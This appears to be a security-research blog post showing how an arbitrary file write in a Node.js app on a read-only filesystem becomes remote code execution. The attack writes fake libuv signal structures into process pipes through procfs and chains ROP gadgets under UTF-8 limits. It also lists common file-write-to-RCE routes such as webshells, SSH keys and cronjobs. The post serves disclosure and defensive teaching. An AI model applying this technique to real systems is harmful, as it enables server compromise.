Infrastructure hardening makes applications more resilient to attacks. These measures raise the bar for attackers, making exploitation more difficult. However, they should not be seen as a silver bullet, as determined attackers can still leverage vulnerabilities in the source code.
In this blog post, we will highlight the importance of fundamental code security by showcasing a technique that attackers can use to turn a file write vulnerability in a Node.js application into remote code execution – even though the target’s file system is mounted read-only. The technique thwarts the restrictions applied in a hardened environment like this by leveraging exposed pipe file descriptors to gain code execution.
This blog post's content was also presented at Hexacon24. We will add a link to the recording as soon as it is available and let you know on X/Twitter and Mastodon.
File Write Vulnerabilities
During our mainly web-focused vulnerability research, we encounter a variety of different vulnerability types, such as Cross-Site Scripting, SQL injection, Insecure Deserialization, Server-Side Request Forgery, and much more. The impact and ease of exploitation of these vulnerability types varies but for a few of them, it is almost certain to assume that the whole application is comprised once that type of vulnerability is identified.
One of these critical vulnerability types is an Arbitrary File Write vulnerability. Attackers still need to figure out what to write where, but there are usually a lot of options to turn this into code execution and thus fully compromise the application’s server:
- Write a PHP, JSP, ASPX, or similar file to the web root.
- Overwrite a templating file that is processed by a server-side templating engine.
- Write to a configuration file (e.g., uWSG .ini file or Jetty .xml file).
- Add a Python site-specific configuration hook.
- Use a generic approach by writing an SSH key, adding a cronjob, or overwriting a user’s .bashrc file.
These examples show that attackers usually find an easy way to turn an Arbitrary File Write vulnerability into code execution. To reduce the extent of such vulnerabilities, an application's underlying infrastructure is often hardened – making it more difficult but not impossible for attackers to exploit it.
File Writes in Hardened Environments
We recently encountered an Arbitrary File Write vulnerability in a Node.js application that turned out to be less easily exploitable. The vulnerability itself was more complex, but it breaks down to the following vulnerable code snippet:
The function fs.writeFile
is used to write a file, and both parameters – filename
and content
– are fully user-controllable. Thus, this is an Arbitrary File Write vulnerability.
When determining the impact of this vulnerability, we noticed that the user running the application is limited to write-permissions for a specific upload folder. Everything else on the file system is read-only. Although this felt like a dead-end for the exploitation of the vulnerability, it led us to the following research question:
Can an Arbitrary File Write vulnerability possibly be turned into code execution even though the target’s file system is mounted read-only?
Read-Only File Writes
On Unix-based systems like Linux, everything is a file. Unlike traditional file systems like ext4, which store data on a physical hard disk drive, there are other file systems that serve a different purpose. One of these is the procfs virtual file system, which is usually mounted at /proc
and acts as a window into the kernel's inner workings. Instead of storing actual files, procfs provides access to real-time information about running processes, system memory, hardware configuration, and more.
One particularly interesting piece of information procfs provides is the open file descriptors of a running process, which can be inspected via /proc/<pid>/fd/
. The files opened by a process may not only be traditional files but also device files, sockets, and pipes. For example, the following command can be used to list the open file descriptors of the Node.js process:
As we can see from the output above, this also includes anonymous pipes (e.g., pipe:[9173261]
). Unlike named pipes, which are exposed as a named file on the file system, writing to anonymous pipes is usually impossible due to the lack of a reference. However, the procfs filesystem allows us to reference the pipe via its entry in /proc/<pid>/fd/
. Compared to other files under procfs, this file write does not require root privileges and can be performed by the low-privileged user running the Node.js application:
Writing to a pipe is even possible if procfs is mounted read-only (e.g. in a Docker container) since pipes are handled by a separate filesystem called pipefs
, which is internally used by the kernel.
This unveils new attack surfaces for attackers who can write arbitrary files as they can feed data to the event handler that reads from an anonymous pipe.
Node.js and Pipes
Node.js is built on the V8 JavaScript engine, which is single-threaded. However, Node.js provides an asynchronous and non-blocking event loop. To do so, it uses a library called libuv. This library uses anonymous pipes to signal and handle events, which are exposed via procfs as we saw in the output above.
When a Node.js application is prone to a file write vulnerability, nothing prevents attackers from writing to these pipes, as they are writable by the same user running the application. But what happens with the data written to the pipes?
When auditing the related libuv source code, a handler named uv__signal_event
caught our attention. It assumes that the data read from the pipe are messages of type uv__signal_msg_t
:
The uv__signal_msg_t
data structure only contains two members, a handle
pointer and an integer called signum
:
The uv_signal_t
type of the handle
pointer is a typedef for the uv_signal_s
data structure, which contains a particularly interesting member called signal_cb
:
This signal_cb
member is a function pointer that is supposed to contain the address of a callback function that is invoked later on in the event handler if the signum
value of both data structures matches:
The following image visualizes the data structure that the event handler expects:
This is a very promising situation for attackers: They can write any data to the pipe, and there is a quick path to the invocation of a function pointer. In fact, we were not the only and first researchers to notice this. On August 8, HackerOne disclosed this great report from Seunghyun Lee, in which he describes a different scenario in which he was able to leverage the open file descriptor from within a Node.js program to bypass any module- and process-based permission – basically a sandbox escape.
Even in the scenario he described here – which we didn’t have in mind – this is not considered a security vulnerability, and the report was closed as informative. That means that the technique we describe in the following sections still applies to the latest version of Node.js and this will probably not change in the near future.
Building Structures
The general strategy of attackers exploiting the event handler with a file write vulnerability may look like this:
- Write a fake
uv_signal_s
data structure to the pipe. - Set the
signal_cb
function pointer to an arbitrary address that they would like to call. - Write a fake
uv__signal_msg_t
data structure to the pipe. - Set the
handle
pointer to theuv_signal_s
data structure written before. - Set the
signum
value for both data structures to the same value. - Gain arbitrary code execution.
Assuming that attackers can only write files, all of this needs to be achieved with a one-shot write without the ability to read any memory beforehand.
The buffer of the event handler is quite huge, which allows attackers to easily write both data structures to the pipe. However, there is a hurdle: the address of the data structures is unknown since all data written to the pipe is stored on the stack:
Thus, attackers wouldn't be able to make the handle
pointer reference the fake uv_signal_s
data structure. This leads to the question: Is there even any data that attackers could reference?
The addresses of the stack, the heap, and all libraries are randomized via ASLR. However, the segments of the Node.js binary itself are not. To our surprise, PIE (position-independent executable) is not enabled for the official Linux build of Node.js:
The reasons for this are apparently performance considerations, as the indirect addressing of PIE adds a small overhead. For attackers, this means that they could reference data in a Node.js segment since this address is known:
The next question is: How could attackers store a fake uv_signal_s
data structure in a Node.js segment? Searching for ways to make Node.js store attacker-controlled data at a static location (e.g. data read from an HTTP request) would be one approach, but this seemed to be quite challenging.
An easier approach is to just use what is already available. By examining the Node.js memory segments, attackers may be able to identify suitable data for a uv_signal_s
fake structure in the existing data.
The attackers’ dream data structure would look similar to this:
This data structure begins with a command string ("touch /tmp/pwned"
) followed by the address of system
at the correct offset to overlap with the signal_cb
function pointer. Attackers would only need to make the signum
value match the fake uv_signal_s
data structure so that the callback function is invoked, which effectively calls system("touch /tmp/pwned")
.
This approach requires the address of system
to be present in a Node.js segment. The global offset table (GOT) would usually be a candidate for this. However, Node.js does not use the system
function, so its address is not present in the GOT. And even if it were present, the beginning of the resulting fake uv_signal_s
data structure would likely be another entry in the GOT and not a useful command string. Thus, another approach seems more viable: a classical ROP chain.
Searching Data Structure Gadgets
The beginning of every ROP chain is the search for useful ROP gadgets. A tool that searches for ROP gadgets usually parses the ELF file on disk and then determines all executable sections. The .text
section is usually the biggest executable section since it stores the instructions of the program itself:
Now the tool iterates over the bytes in this section and looks for a ret
instruction, for example, since this is a suitable last instruction for a ROP gadget. The tool then goes from the byte that represents the ret
instruction back again – byte by byte – to determine all possibly useful ROP gadgets:
In this case, however, this is not what attackers need. Instead of a ROP gadget, they need an address that references a fake uv_signal_s
data structure, which references a ROP gadget via its signal_cb
function pointer. So, there is one indirection: the ROP gadget (address of a sequence of instructions) needs to be stored in the referenced data itself:
In order to identify suitable data structures like this, attackers need to search through the Node.js image similar to a classical ROP gadget finder tool. The difference, though, is that attackers are not only interested in executable sections like the .text
section. The memory where the fake data structure resides does not have to be executable. Attackers need a pointer to a gadget. Thus, they can consider all segments that are at least readable. Also, this search can be done in-memory instead of only parsing the ELF file on disk. This way, attackers can also find data structures that were only created during runtime in the .bss
section, for example. This may lead to false positives or environment-specific structures but increases their chance of getting useful findings, which can be verified manually.
A basic implementation of this in-memory search for fake data structures is actually pretty straightforward:
The Python script iterates over all Node.js memory regions and interprets 8 bytes at a time as a pointer, which it tries to reference. If the address is mapped and references memory in an executable segment, it determines if the byte sequence stored at this address is a useful ROP gadget:
This is what the Python script looks like in action:
All potentially useful ROP gadgets are outputted and can now be used as the first initial ROP gadget that is executed when the callback function is invoked. Since all data written to the pipe is stored on the stack, it is sufficient to find a suitable pivoting gadget for this first gadget. Once attackers have pivoted the stack pointer to controlled data, a classical ROP chain can be used:
One caveat remains when using this technique to exploit an arbitrary file vulnerability. Usually, the function used to write the file (fs.writeFile
in this case) is limited to valid UTF-8 data. Accordingly all data written to the pipe must be valid UTF-8.
Overcoming UTF-8 Restrictions
It is not challenging to find useful UTF-8-compatible gadgets for the classical ROP chain due to the huge size of the Node.js binary (~110M for the latest x64 build). However, this limitation further restricts the potentially suitable data structures for the fake uv_signal_s
in the existing data. Based on this, an additional check needs to be added to the script to verify that the base address of the fake data structure is valid UTF-8:
Even with this additional check, the script still yields suitable fake data structures that reference a pivoting gadget like the following:
This is how the related data structure looks like in memory:
The base address of this fake data structure (0x4354c41
) is valid UTF-8, so the handle
pointer in the uv__signal_msg_t
data structure can be correctly populated. However, there is another UTF-8-related problem. This time with the signum
value:
The last byte of the signum value is 0xf0
, which is not valid UTF-8. If an attacker tries to write this byte via the File Write vulnerability, it is replaced with a replacement character and the signum
value check fails. If we enter 0xf0
in our UTF-8 visualizer, we can see that this byte introduces a 4-byte UTF-8 sequence:
Accordingly, a UTF-8 parser expects 3 continuation bytes following this byte. Since the uv__signal_msg_t
data structure contains an 8-byte pointer and a 4-byte integer, the compiler adds 4 additional padding bytes to align the structure to 16 bytes. These bytes can be used to add 3 continuation bytes and thus craft a valid UTF-8 sequence:
The above floppy disc, for example, is a valid 4-byte UTF-8 sequence that begins with 0xf0
. By adding these continuation bytes, attackers can fulfill the requirements of the whole payload being valid UTF-8 and make both signum
values match:
With this last hurdle out of the way, attackers are able to gain remote code execution.
The following video demonstrates the exploit against the vulnerable example application, which is running as a low-privileged user on a system with a read-only root file system and read-only procfs:
Learnings and Conclusion
The “Everything is a file” philosophy on Unix-based systems opens up uncommon attack surfaces when exploiting File Write vulnerabilities. In this blog post, we showcased this with a technique that can be used to turn a File Write vulnerability in a Node.js application into Remote Code Execution. Since the event handler code is from libuv, this technique can also be applied to other software that uses libuv, like julia.
The generic approach is even applicable without Node.js and libuv. Whenever an application uses pipes as a communication mechanism, attackers may leverage a File Write vulnerability to target the pipe file descriptors exposed via procfs. As this example has shown, this might not be considered in a common threat model but can give remote attackers the ability to execute arbitrary code.
From a defensive perspective, this example highlights that infrastructure hardening can only be seen as an additional defense layer and cannot replace fundamental code security. Determined attackers can exploit vulnerabilities in the source code even though hardening measures have been employed. This greatly demonstrates why code security, as implied by Clean Code, is so important and why vulnerabilities should be fixed at their origin: the source code.